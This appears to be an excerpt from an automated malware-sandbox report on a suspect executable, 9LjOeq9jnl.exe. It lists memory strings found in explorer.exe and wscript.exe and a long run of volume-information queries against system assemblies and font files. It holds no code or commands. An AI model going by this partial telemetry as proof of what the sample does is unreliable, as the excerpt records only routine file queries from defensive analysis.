Source: explorer.exe, 00000008.00000000.369398620.00000000011E0000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.563276008.00000000033F0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.369398620.00000000011E0000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.563276008.00000000033F0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000008.00000000.356006390.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Users\user\Desktop\9LjOeq9jnl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Users\user\Desktop\9LjOeq9jnl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
